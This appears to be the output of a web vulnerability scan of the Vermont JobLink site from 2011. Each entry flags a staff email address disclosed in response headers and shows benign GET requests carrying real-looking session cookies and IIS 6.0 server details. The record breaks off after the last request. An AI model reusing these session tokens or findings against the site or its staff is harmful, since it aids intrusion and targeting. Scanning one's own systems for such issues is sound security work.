<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off --> <!-- Caching is Off -->
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_settings_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_ssncheck.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_veterans_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_warn_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/mn_warninfo_dsp.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/services/schools/schsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/FAQ.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:04 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/contactus.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/employeroverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/joboverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/works/jobsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email addresses were disclosed in the response:
joseph.lucia@state.vt.us
vjl@state.vt.us
Request
GET /ada/works/linkview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
